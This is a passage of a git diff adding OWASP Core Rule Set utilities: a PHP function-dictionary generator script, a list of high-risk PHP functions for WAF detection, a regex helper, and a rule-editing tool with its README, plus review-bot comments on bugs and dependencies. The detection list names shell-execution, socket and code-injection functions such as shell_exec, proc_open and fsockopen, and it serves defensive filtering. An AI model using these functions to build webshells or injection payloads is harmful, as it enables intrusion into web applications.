" + PWD_SAVE=$(pwd) + cd $PHP_REPO || break_on_error 1 "Cannot cd to $PHP_REPO" + git checkout master >/dev/null 2>&1 + git pull --depth 1 >/dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + cd "$PWD_SAVE" || break_on_error 1 "Cannot cd back to $PWD_SAVE" +fi + +# Step 2 - Extract Function Names +echo -n "Extracting PHP function names ... " +# Strings containing "$" are excluded (E.g. "{$this->getDeclarationName") +grep -o --no-file -R 'ZEND_FUNCTION(.*)' "$PHP_REPO" | grep -v '\$' | cut -f2 -d\( | cut -f1 -d\) | sort | uniq > $TMP_PHP_FUNCTIONS +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR +echo "done ($(wc -l "$TMP_PHP_FUNCTIONS" | xargs echo | cut -d\ -f1 ) function names found)" + +# Step 3 - Filter 1: Is it an English word +echo -n "Extracting English words out of list of PHP function names ... " +$SPELL_PATH --machine --extended "$TMP_PHP_FUNCTIONS" > "$TMP_ENGLISH_WORDS" +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR "$(cat "$TMP_ENGLISH_WORDS")" +echo "done ($(wc -l "$TMP_ENGLISH_WORDS" | xargs echo | cut -d\ -f1 ) english words found)" +# Step 4 - Output 933161 +if [ "$DO_RULE_933161" == "1" ]; then + # Being 933161 a stricter sibling of 933160, 933160 entries are also added to 933161. + # We read the 933160 file skipping comments and empty lines. Entries are added to 933161 (if not already present). 
+ grep -v '^#' "$RA_FILE_PATH$R933160_FILENAME" | awk NF | while read -r R933160_ENTRY; do + + if [ $(grep -c -E "^$R933160_ENTRY$" "$TMP_ENGLISH_WORDS") -eq 0 ]; then + # we have to add this function to 933161 + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME added to the stricter sibling $R933161_FILENAME" + echo "$R933160_ENTRY" >> "$TMP_ENGLISH_WORDS" + else + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME already present in the stricter sibling $R933161_FILENAME" + fi + + done + + sort -o "$TMP_ENGLISH_WORDS" "$TMP_ENGLISH_WORDS" + echo -n "Writing output for rule 933161 to $R933161_FILENAME ... " + echo "$TOOLCHAIN_PREFIX" > $RA_FILE_PATH$R933161_FILENAME + echo -e "\n$PHP_DICTIONARY_GEN_PREFIX\n" >> $RA_FILE_PATH$R933161_FILENAME + echo "$R933161_PREFIX" >> $RA_FILE_PATH$R933161_FILENAME + # new line print is in a separate echo to avoid echoing the prefix without enabling interpretation of backslash escapes + echo -e -n "\n" >> $RA_FILE_PATH$R933161_FILENAME + cat "$TMP_ENGLISH_WORDS" >> $RA_FILE_PATH$R933161_FILENAME + echo "done" +fi + +# Step 5 - Create or update frequency list +echo "Creating / updating frequency list for functions (namely creating may take a while) ..." +sed -i -e "s/^/^/" -e "s/$/$/" "$TMP_ENGLISH_WORDS" +cat "$TMP_PHP_FUNCTIONS" | grep -v -E -f "$TMP_ENGLISH_WORDS" | while read -r FUNCTION; do + + grep -q -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" + if [ $? -ne 0 ]; then + # function name not found in frequency list + echo "Function $FUNCTION not found in frequency file. Attempting to add." + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo " Retrieving frequency failed. Cannot add item." 
+ else + echo " Adding entry for function $FUNCTION with frequency $NUM" + echo "$FUNCTION $NUM $MYDATE" >> "$PHP_FUNCTIONS_FREQUENCIES" + sort -o "$PHP_FUNCTIONS_FREQUENCIES" "$PHP_FUNCTIONS_FREQUENCIES" + fi + else + # function name found in frequency list + TIMESTAMP=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f3) + TIMESTAMP_SECONDS=$(date -d "$TIMESTAMP" +%s 2>&1) # For MacOS users: gdate is needed instead of date + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR "$TIMESTAMP_SECONDS\nError. Check that date is the GNU date binary from coreutils." + DIFF_SECONDS=$((MYDATE_SECONDS - TIMESTAMP_SECONDS)) + DIFF_DAYS=$(($DIFF_SECONDS / 86400)) + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + vprint "Function $FUNCTION exists (timestamp: $TIMESTAMP, age: $DIFF_DAYS, frequency: $NUM)" + if [ $DIFF_DAYS -gt "$AGE_LIMIT" ]; then + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo "Entry for function $FUNCTION is too old. Updating failed. Removing record." + sed -i -e "/^$FUNCTION /d" "$PHP_FUNCTIONS_FREQUENCIES" + else + echo "Entry for function $FUNCTION is too old. Updating with new data (new frequency: $NUM)." + sed -i -e "s/^$FUNCTION .*/$FUNCTION $NUM $MYDATE/" "$PHP_FUNCTIONS_FREQUENCIES" + fi + + fi + fi + +done +echo "Done creating / updating frequency list." + +# Step 6 - Filter 2: Output depending on frequency +echo "Starting filtering PHP functions names with frequency limit: $FREQUENCY_LIMIT..." 
+cat "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f1 | while read -r FUNCTION; do + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + if [ -n "$NUM" ] && [ "$NUM" -gt "$FREQUENCY_LIMIT" ]; then + if [ "$DO_RULE_933150" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933150_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + fi + else + if [ "$DO_RULE_933151" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933151_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_RARE" + fi + fi +done + +echo "Done filtering PHP functions names." +if [ -s "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" ]; then + FAILED_COUNTER=$(echo "$PHP_FUNCTIONS_FREQUENCIES_ERRORS" | wc -l | xargs echo) + echo -n "Failed to retrieve frequency for $FAILED_COUNTER function(s)" + if [ $VERBOSE -eq 1 ]; then + echo ":" + cat "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + else + echo "." + fi +fi + +if [ "$DO_RULE_933150" == "1" ]; then + # 933150 comes with a second source of non english words high-risk php functions. + # Any occurrence that is part of that list and not already in 933150 is now added. + cat "$HIGH_RISK_FUNCTIONS_FILENAME" | while read -r HIGH_RISK_FUNC; do + if [ $(grep -c -E "^$HIGH_RISK_FUNC$" "$TMP_PHP_FUNCTIONS_FREQUENT") -eq 0 ]; then + # we have to add this function to 933150 + echo "High-risk function \"$HIGH_RISK_FUNC\" added to $R933150_FILENAME" + echo "$HIGH_RISK_FUNC" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + else + echo "High-risk function \"$HIGH_RISK_FUNC\" already present in $R933150_FILENAME" + fi + + done + sort -o "$TMP_PHP_FUNCTIONS_FREQUENT" "$TMP_PHP_FUNCTIONS_FREQUENT" + echo "File $R933150_FILENAME updated." + echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933150_FILENAME + cat "$TMP_PHP_FUNCTIONS_FREQUENT" >> $DATA_FILE_PATH$R933150_FILENAME +fi +if [ "$DO_RULE_933151" == "1" ]; then + echo "File $R933151_FILENAME updated." 
+ echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933151_FILENAME + cat "$TMP_PHP_FUNCTIONS_RARE" >> $DATA_FILE_PATH$R933151_FILENAME +fi + +if [ "$DO_RULE_933161" == "1" ]; then + echo '933161.ra file updated, mind to run "crs-toolchain regex update --all" before committing changes' +fi + +TIME_END=$(date +"%s") +echo "The script took $((TIME_END-MYDATE_SECONDS)) seconds to complete." + + +# -------------------------------------------------- +# Cleanup +# -------------------------------------------------- + +# Temp files are cleaned via trap set above. diff --git a/nginx/config/owasp-crs/util/php-dictionary-gen/php-high-risk-functions.txt b/nginx/config/owasp-crs/util/php-dictionary-gen/php-high-risk-functions.txt new file mode 100644 index 00000000..78b69852 --- /dev/null +++ b/nginx/config/owasp-crs/util/php-dictionary-gen/php-high-risk-functions.txt 
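Review bot: `FAILED_COUNTER=$(echo "$PHP_FUNCTIONS_FREQUENCIES_ERRORS" | wc -l | xargs echo)` echoes a variable that is never assigned (the file is `TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS`) instead of reading the file, so the reported count is always 1; `FAILED_COUNTER=$(wc -l < "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS")` fixes it. The `-r` validation loop `echo "$RULES_CMDLINE" | tr " " "\n" | while read -r RULE` runs in a pipeline subshell, so its `exit` only ends the subshell and an unknown rule id is not actually fatal as the message claims; iterating with `for RULE in $RULES_CMDLINE` (IFS is already `$'\n\t'`, so add a space) or `exit 1` from a here-string loop would make it fatal. In `get_frequency`, `curl -v ... 2>&1` captures the outgoing `Authorization: Bearer $GITHUB_TOKEN` header into `CURL_OUTPUT`; it is only piped to `grep` today, but `-v` output is the first thing someone echoes when debugging, so `curl -sS -D - ...` keeps the `x-ratelimit-remaining` check working without storing the token. `cd $PHP_REPO` should be quoted like the other paths, and the `DO_RULE_933150`/`933151`/`933161` flags are only read in the visible part of the hunk — their assignment presumably sits in the heredoc region that this rendering stripped, so that could not be checked.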
@@ -0,0 +1,214 @@ +array_diff_uassoc +array_diff_ukey +array_filter +array_intersect_uassoc +array_intersect_ukey +array_map +array_reduce +array_udiff +array_udiff_assoc +array_udiff_uassoc +array_uintersect +array_uintersect_assoc +array_uintersect_uassoc +base64_decode +base64_encode +bson_decode +bson_encode +bzdecompress +bzopen +convert_uuencode +curl_exec +curl_file_create +curl_init +debug_backtrace +error_reporting +escapeshellarg +escapeshellcmd +exif_imagetype +exif_read_data +exif_tagname +exif_thumbnail +finfo_open +fopen +fputs +fsockopen +ftp_connect +ftp_get +ftp_nb_get +ftp_nb_put +ftp_put +function_exists +fwrite +get_cfg_var +get_class_methods +get_class_vars +get_current_user +get_defined_constants +get_defined_functions +get_defined_vars +get_meta_tags +getcwd +getenv +getimagesize +getlastmod +getmygid +getmyinode +getmypid +getmyuid +gzcompress +gzdecode +gzdeflate +gzinflate +gzencode +gzfile +gzopen +gzread +gzuncompress +gzwrite +hash_file +hash_hmac_file +hash_update_file +header_register_callback +hex2bin +highlight_file +html_entity_decode +htmlentities +htmlspecialchars +htmlspecialchars_decode +image2wbmp +imagecreatefromgif +imagecreatefromjpeg +imagecreatefrompng +imagecreatefromwbmp +imagecreatefromxbm +imagecreatefromxpm +imagegd +imagegd2 +ini_get +ini_get_all +ini_set +iptcembed +is_dir +is_executable +is_file +is_readable +is_writable +is_writeable +iterator_apply +json_decode +json_encode +mb_ereg +mb_ereg_match +mb_ereg_replace +mb_ereg_replace_callback +mb_eregi +mb_eregi_replace +mb_parse_str +md5_file +method_exists +mkdir +move_uploaded_file +mysql_query +ob_clean +ob_end_clean +ob_end_flush +ob_flush +ob_get_clean +ob_get_contents +ob_get_flush +ob_start +odbc_connect +odbc_exec +odbc_execute +odbc_result +odbc_result_all +parse_ini_file +parse_str +pfsockopen +pg_connect +pg_execute +pg_prepare +pg_query +php_strip_whitespace +php_uname +phpinfo +phpversion +posix_getegid +posix_geteuid +posix_getgid +posix_getlogin 
+posix_getpwnam +posix_getpwuid +posix_kill +posix_mkfifo +posix_mknod +posix_ttyname +preg_match +preg_match_all +preg_replace +preg_replace_callback +preg_replace_callback_array +preg_split +print_r +proc_close +proc_get_status +proc_nice +proc_open +proc_terminate +putenv +rawurldecode +rawurlencode +read_exif_data +readdir +readgzfile +register_shutdown_function +register_tick_function +rename_function +runkit_constant_add +runkit_constant_redefine +runkit_function_add +runkit_function_copy +runkit_function_redefine +runkit_function_rename +runkit_method_add +runkit_method_copy +runkit_method_redefine +runkit_method_rename +session_set_save_handler +session_start +set_error_handler +set_exception_handler +set_include_path +set_magic_quotes_runtime +setdefaultstub +sha1_file +shell_exec +show_source +simplexml_load_file +simplexml_load_string +socket_connect +socket_create +spl_autoload_register +sqlite_array_query +sqlite_create_aggregate +sqlite_create_function +sqlite_exec +sqlite_open +sqlite_popen +sqlite_query +sqlite_single_query +sqlite_unbuffered_query +stream_context_create +stream_socket_client +stripcslashes +stripslashes +strrev +uasort +uksort +unserialize +urldecode +urlencode +usort +var_dump +zlib_decode diff --git a/nginx/config/owasp-crs/util/regexp-tricks/negative-lookahead.py b/nginx/config/owasp-crs/util/regexp-tricks/negative-lookahead.py new file mode 100644 index 00000000..0145ef39 --- /dev/null +++ b/nginx/config/owasp-crs/util/regexp-tricks/negative-lookahead.py 
@@ -0,0 +1,121 @@ +import argparse + +# WARNING: This script is EXPERIMENTAL. Use with caution. +# +# Known issues: +# * At the moment, it will probably not work with more than two strings. +# +# Known limitations: +# * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, +# make sure that subtrings of the negative lookahead are not harmful in any way. + +parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ + a regex that acts like a negative lookahead") +parser.add_argument("strings", type=str, nargs='+', + help="the strings to convert into a negative lookahead") +parser.add_argument("--prefix", type=str, default="", + help="sets a prefix for the resulting regex") +parser.add_argument("--suffix", type=str, default="", + help="sets a suffix for the resulting regex") + +args = parser.parse_args() + +# Return the longest prefix of all list elements. Shamelessly copied from: +# https://stackoverflow.com/questions/6718196/determine-the-common-prefix-of-multiple-strings +def commonprefix(m): + "Given a list of pathnames, returns the longest common leading component" + if not m: return '' + s1 = min(m) + s2 = max(m) + for i, c in enumerate(s1): + if c != s2[i]: + return s1[:i] + return s1 + +# flatten returns a string with concatenated dictionary keys +def flatten(dict): + s = "" + + for key in dict.keys(): + s += key + + return s + +# set returns a character set containing the unique characters across all strings for the given index +def set(strings, index, flags): + dict = {} + + for s in strings: + # Continue so we don't panic + if index > len(s) -1: + continue + + dict[s[index]] = '' + + return "[" + flags + flatten(dict) + "]" + +# prepare converts a string for negative lookaheads emulation +def prepare(s, offset): + r = "" + + if len(s) == 0: + return r + + for i in range(offset, len(s)): + for j in range(0, i + 1): + if j == i: + r += "[^" + s[j] + 
"]" + else: + r += s[j] + + if i != len(s) - 1: + r += "|" + + return r + +# run runs the +def run(): + strings = args.strings + + r = "" + r += set(strings, 0, "^") + + c = "" + d = {} + + # Only find common string if we have more than one + if len(strings) > 1: + c = commonprefix(strings) + + # Collect all characters after the common substring from every string + for s in strings: + if len(s) > len(c) and s.startswith(c): + d[s[len(c)]] = '' + + # Add the common string to the regex to prevent accidental matching + if len(c) > 0: + if len(c) > 1: + r += "|" + "(?:" + prepare(c, 1) + ")" + + r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" + + for s in strings: + g = "" + + # When the common string is > 0, offset with len(c) + 1 because we handled this earlier + if len(c) > 0: + g = prepare(s, len(c) + 1) + else: + g = prepare(s, 1) + + # Add OR boolean if necessary + if len(g) > 0: + r += "|" + + r += g + + print(args.prefix + "(?:" + r + ")" + args.suffix) + +# Only run if script is called directly +if __name__ == "__main__": + run() diff --git a/nginx/config/owasp-crs/util/rule_ctl/README.md b/nginx/config/owasp-crs/util/rule_ctl/README.md new file mode 100644 index 00000000..374b37e1 --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/README.md @@ -0,0 +1,135 @@ +draft + +# OWASP CRS Rule Control Script +This script aims to help when a bulk change on configuration files is needed. rule_ctl.py can, for example, change the value of an action on all rules, or can add/remove/rename a tag on each rule in a file, or can add/remove a transformation function only in rules that match range 942100-942190, etc... + +## Example Usage + +There're only two mandatory parameters: `--config` and `--filter-rule-id`. + +**--config** set the target config file
+**--filter-rule-id** a regex that matches only rule ids to change
+
+For example, if you want to add a new tag on each rule in file `REQUEST-933-APPLICATION-ATTACK-PHP.conf` you can do:
+
+```sh
+python3 util/rule_ctl/rule_ctl.py \
+ --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \
+ --filter-rule-id ^933.+ \
+ --append-tag foo
+ --dryrun
+```
+
+`--dryrun` sends to stdout the result of changes and prevent writing changes on file. It's a good idea to always check all commands with dryrun before overwrite the target configuration file.
+
+You can even alphabetically sort tag list while adding new tags:
+```sh
+python3 util/rule_ctl/rule_ctl.py \
+ --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \
+ --filter-rule-id ^933.+ \
+ --append-tag foo
+ --sort-tag
+ --dryrun
+```
+
+## Variables
+- `--append-variable`: Append a variable on the variable list of selected rules
+- `--remove-variable`: Remove exact matching variable from selected rules
+- `--replace-variable`: Replace variable on selected rules
+
+### Examples
+Replace the variable name `ARGS` with `ARGS_GET`
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^.\* \
+ --replace-variable ARGS,ARGS_GET \
+ --dryrun
+```
+
+Replace the variable `ARGS` with `!ARGS_GET:'lisa'`
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^.\* \
+ --replace-variable ARGS,\!ARGS_GET:\'lisa\' \
+ --dryrun
+```
+
+## Tags
+- `--append-tag`: Append a new tag to the tag list on selected rules
+- `--remove-tag`: Remove tag from tag list on selected rules
+- `--rename-tag`: Rename tag on selected rules
+- `--sort-tags`: Alphabetically sort tag list on selected rules
+
+### Examples
+Append a new tag `foo` and sort tag list
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^.\* \
+ --append-tag foo \
+ --sort-tags \
+ --dryrun
+```
+
+Remove a tag `foo`
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^.\* \
+ --remove-tag foo \
+ --dryrun
+```
+
+Rename a tag `foo`
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^.\* \
+ --rename-tag foo,bar \
+ --dryrun
+```
+
+## Transformation Functions
+- `--append-tfunc`: Append a new transformation function on selected rules
+- `--remove-tfunc`: Remove a transformation function on selected rules
+
+### Examples
+Append `t:lowercase` to all selected rules (you don't need the `t:` prefix)
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^.\* \
+ --append-tfunc lowercase \
+ --dryrun
+```
+
+## Actions
+- `--replace-action`: Replace action on selected rules
+- `--remove-action`: remove action from selected rules
+
+### Examples
+Replace action `severity:CRITICAL` with `severity:INFO` and set a new message on rule id 125
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^125 \
+ --replace-action severity:CRITICAL,severity:INFO \
+ --uncond-replace-action 'msg:this is a new message for rule 125' \
+ --dryrun
+```
+
+## CTL
+- `--append-ctl`: Append a new ctl action on selected rules
+
+### Examples
+Remove rule id 1337 on rule 125 by adding ctl:ruleRemoveById=1337. Do it on main rule (skipping chained rules if present)
+```sh
+python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \
+ --filter-rule-id ^125 \
+ --append-ctl ruleRemoveById=1337 \
+ --skip-chain \
+ --dryrun
+```
+
+## Others
+- `--target-file`: Set the target file where changes will be saved (default: use file set by `--config`)
+- `--skip-chain`: Skip chained rules
+- `--dryrun`: Do not write any changes, just output the results
+- `--debug`: Show debug messages
+- `--silent`: Used with `--dryrun` and `--debug` doesn't write and shows only debug messages
+- `--json`: Used with `--dryrun` return the msc_pyparser JSON output instead of ModSecurity file
diff --git a/nginx/config/owasp-crs/util/rule_ctl/pyproject.toml b/nginx/config/owasp-crs/util/rule_ctl/pyproject.toml
new file mode 100644
index 00000000..77c7e6ef
--- /dev/null
+++ b/nginx/config/owasp-crs/util/rule_ctl/pyproject.toml
@@ -0,0 +1,5 @@
+[tool.pytest.ini_options]
+minversion = "6.0"
+testpaths = [
+ "tests",
+]
diff --git a/nginx/config/owasp-crs/util/rule_ctl/requirements.txt b/nginx/config/owasp-crs/util/rule_ctl/requirements.txt
new file mode 100644
index 00000000..2e1b1f04
--- /dev/null
+++ b/nginx/config/owasp-crs/util/rule_ctl/requirements.txt
@@ -0,0 +1,3 @@
+argparse
+msc_pyparser
+pytest
diff --git a/nginx/config/owasp-crs/util/rule_ctl/rule_ctl.py b/nginx/config/owasp-crs/util/rule_ctl/rule_ctl.py
new file mode 100755
index 00000000..afa4f155
--- /dev/null
+++ b/nginx/config/owasp-crs/util/rule_ctl/rule_ctl.py
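Review bot: The `argparse` entry in requirements.txt resolves to the separate `argparse` distribution on PyPI, a backport that stopped being necessary with Python 2.7/3.2, not to the standard-library module that rule_ctl.py actually imports; `pip install -r requirements.txt` therefore pulls in an unneeded, unmaintained third-party package purely as supply-chain surface. Drop that line. The remaining entries, `msc_pyparser` and `pytest`, are unpinned, so the tool that rewrites the WAF rule files runs against whatever version the index serves at install time; pin them (`msc_pyparser==<version the tests were run against>`, hashes too if the project installs with `--require-hashes`) so the rule-editing environment is reproducible.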
@@ -0,0 +1,801 @@ +#! /usr/bin/env python + +import sys, re, json, uuid + +try: + import argparse, msc_pyparser +except: + print(f"Error: missing modules.\nYou can install all dependences with: pip3 install -r requirements.txt") + sys.exit(1) + +ACTION_ORDER = { + key: index for index, key in enumerate( + [ + "id", + "phase", + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitiseArg", + "sanitiseRequestHeader", + "sanitiseMatched", + "sanitiseMatchedBytes", + "ctl", + "ver", + "severity", + "multiMatch", + "initcol", + "setenv", + "setvar", + "expirevar", + "chain", + "skip", + "skipAfter" + ] + ) +} + +class Context(object): + def __init__(self): + self.args = () + self.line_number_change = 0 + self.next_index_to_parse = 0 + self.parser = None + self._rules = [] + self._rules_map = {} + + def parse_rules(self, data): + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data, debug = False) + + for line in mparser.configlines: + type = line["type"] + if type == "SecAction": + rule = SecAction(line, self) + elif type == "Comment": + rule = Comment(line, self) + elif type == "SecRule": + rule = SecRule(line, self) + else: + rule = Directive(line, self) + + self._rules.append(rule) + if isinstance(rule, SecAction): + if rule.is_chained(): + self._rules_map[rule.id]['chained'].append(rule) + else: + self._rules_map[rule.id] = { + 'rule': rule, + 'chained': [] + } + yield rule + + def get_chain_starter_rule(self, rule): + try: + self._rules_map[rule.id]['rule'] + except KeyError: + # Chained rules don't have ID during initialization. 
+ # In this case, however, the last parsed rule now has one + return self._rules_map[self._rules[-1].id]['rule'] + + def dprint(self, rule_id, action, message, indent): + if not indent: + indent=0 + + prefix = "[*]" + if indent > 0: + prefix = "`" + + if not rule_id: + rule_id = "chained" + + print(f'{" "*int(indent)}{prefix} \033[92m{rule_id}/{action}\033[0m: {message}') + + def generate_output(self): + mwriter = msc_pyparser.MSCWriter(self.generate_lines()) + mwriter.generate() + return mwriter.output + + def generate_lines(self): + generated_lines = [] + line_number_change = 0 + for rule in self._rules: + lines, line_number_change = rule.generate_lines(line_number_change) + generated_lines.append(lines) + return generated_lines + + def parse_arguments(self, args=None): + args_parser = self._create_args_parser() + self.args = args_parser.parse_args(args) + + def _create_args_parser(self): + parser = argparse.ArgumentParser(description="OWASP CRS Configuration Control") + parser.add_argument("--config", dest="config", help="OWASP ModSecurity CRS config file path", required=True) + parser.add_argument("--filter-rule-id", dest="filter_rule_id", help="Filter on ruleid (regex)", required=False) + parser.add_argument("--append-variable", dest="append_variable", help="Append var on SecRule (string)", action='append', required=False) + parser.add_argument("--remove-variable", dest="remove_variable", help="Remove var from SecRule (string)", action='append', required=False) + parser.add_argument("--replace-variable", dest="replace_variable", help="Replace var in SecRule (old,new) (string)", action='append', required=False) + parser.add_argument("--append-tag", dest="append_tag", help="Append tag on SecRule (string)", required=False) + parser.add_argument("--remove-tag", dest="remove_tag", help="Remove tag from SecRule (string)", required=False) + parser.add_argument("--rename-tag", dest="rename_tag", help="Rename tag on SecRule (old,new) (string)", required=False) + 
parser.add_argument("--sort-tags", dest="sort_tags", help="Sort tag list in SecRule", action="store_true", required=False) + parser.add_argument("--append-tfunc", dest="append_tfunc", help="Append transformation func on SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--remove-tfunc", dest="remove_tfunc", help="Remove transformation func from SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--append-action", dest="append_action", help="Append action on Secrule (example: 'severity:CRITICAL) (string)", required=False) + parser.add_argument("--replace-action", dest="replace_action", help="Replace action (example: 'severity:CRITICAL,severity:INFO') (string)", required=False) + parser.add_argument("--remove-action", dest="remove_action", help="Remove action from SecRule (string)", required=False) + parser.add_argument("--append-ctl", dest="append_ctl", help="Append ctl action on SecRule (example: 'ruleRemoveTargetById=1234;ARGS:passwd') (string)", required=False) + parser.add_argument("--target-file", dest="target_file", help="Save changes in another file (string)", required=False) + parser.add_argument("--skip-chain", dest="skip_chain", help="Skip chained rules", action="store_true", required=False) + parser.add_argument("--dryrun", dest="dryrun", help="Show changes without write", action="store_true", required=False) + parser.add_argument("--silent", dest="silent", help="Do not output content file on dryrun", action="store_true", required=False) + parser.add_argument("--debug", dest="debug", help="Show debug messages", action="store_true", required=False) + parser.add_argument("--json", dest="output_json", help="Get all output in JSON format", action="store_true", required=False) + return parser + +class RuleFileItem(object): + def __init__(self, data, context): + self._data = data + self._line_numbers = {"rule_line": data["lineno"]} + + def modify(self, context): + 
pass + + def generate_lines(self, line_number_change): + new_line_number_change = self._update_line_numbers(line_number_change) + return (self._data, new_line_number_change) + + def _update_line_numbers(self, line_number_change): + self._data["lineno"] = self._line_numbers["rule_line"] + line_number_change + + return line_number_change + +class SecAction(RuleFileItem): + TAG_RENAME_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_VALUES_REGEX = re.compile('^([^:]+)(?::(.+))?$') + CTL_APPEND_REGEX = re.compile('^([^=]+)=([^;]+)(;[^:]+:.+|)$') + CTL_APPEND_PARAMS_REGEX = re.compile('^;([^:]+):(.+)$') + id = None + _id_matcher = None + + def __init__(self, data, context): + super().__init__(data, context) + + for action in self.get_actions(): + action["id"] = uuid.uuid4() + if action["act_name"] == "id": + self.id = int(action["act_arg"]) + break + + if "oplineno" in self._data: + self._line_numbers["opline"] = self._data["oplineno"] + for action in self.get_actions(): + self._line_numbers[("action", uuid)] = action["lineno"] + + def _parse_var(self, variable): + negated = False + counter = False + newvar = variable + newvarpart = "" + quote_type = "no_quote" + m = re.match('^([!&]?)([^:]+)(?::(.+))?$', variable) + if m: + counter = m.group(1) == '&' + negated = m.group(1) == '!' 
+ newvar = m.group(2) + varpart = m.group(3) + if varpart is not None: + if varpart[0] == '"' and varpart[-1] == '"': + quote_type = 'quoted' + varpart = varpart[1:-1] + elif varpart[0] == "'" and varpart[-1] == "'": + quote_type = 'quotes' + varpart = varpart[1:-1] + newvarpart = varpart + return { + "variable": newvar, + "variable_part": newvarpart, + "quote_type": quote_type, + "negated": negated, + "counter": counter + } + + def _is_equal_variable(self, variable1, variable2): + compare_fields = ("variable", "variable_part", "negated", "counter") + return all(variable1[field] == variable2[field] for field in compare_fields) + + def _has_variable(self, variable): + for var in self.get_variables(): + if self._is_equal_variable(variable, var): + return True + return False + + + + def _update_line_numbers(self, line_number_change): + #TODO: doesn't yet work when order changes, e.g. variables and tags may not have been grouped together + super()._update_line_numbers(line_number_change) + + first_line_number = last_line_number = self._data["lineno"] + + if "oplineno" in self._data: + last_line_number = self._line_numbers["opline"] + line_number_change + self._data["oplineno"] = last_line_number + + + for action in self.get_actions(): + try: + last_line_number = self._line_numbers[("action", action["id"])] + line_number_change + action["lineno"] = last_line_number + except KeyError: + # keep everything on one line if it already was + if any(lineno > self._line_numbers['rule_line'] for lineno in self._line_numbers.values()): + last_line_number += 1 + action["lineno"] = last_line_number + + original_first_line_number = min(self._line_numbers.values()) + original_last_line_number = max(self._line_numbers.values()) + original_length = original_last_line_number - original_first_line_number + new_length = last_line_number - first_line_number + start_change = first_line_number - original_first_line_number + length_change = new_length - original_length + total_change = 
length_change + start_change + return total_change + + def modify(self, context): + if context.args.filter_rule_id and not self.matches_id(context.args.filter_rule_id): + return + + self.append_tag(context) + self.remove_tag(context) + self.rename_tag(context) + self.append_tfunc(context) + self.remove_tfunc(context) + self.append_action(context) + self.replace_action(context) + self.remove_action(context) + self.append_variables(context) + self.remove_variables(context) + self.replace_variables(context) + self.append_ctl(context) + self.sort_tags(context) + + def get_actions(self): + try: + return self._data["actions"] + except KeyError: + return [] + + def set_actions(self, actions): + self._data["actions"] = actions + + def get_variables(self): + try: + return self._data["variables"] + except KeyError: + return [] + + def set_variables(self, variables): + self._data["variables"] = variables + + def get_tags(self): + return [action for action in self.get_actions() if action["act_name"] == "tag"] + + def get_ctls(self): + return [action for action in self.get_actions() if action["act_name"] == "ctl"] + + def matches_id(self, id_pattern): + if self._id_matcher is None: + self._id_matcher = re.compile(id_pattern) + return self._id_matcher.match(str(self.id)) != None + + def append_tag(self, context): + if context.args.append_tag is None: + return + + #TODO: support appending multiple tags + tags = self.get_tags() + if context.args.append_tag in [tag["act_arg"] for tag in tags]: + return + + actions = self.get_actions() + new_act_list = [] + last_tag_line = 0 + tag_order = ACTION_ORDER["tag"] + new_tag = { + 'id': uuid.uuid4(), + 'act_name': 'tag', + 'lineno': 0, + 'act_quote': 'quotes', + 'act_arg': context.args.append_tag, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = 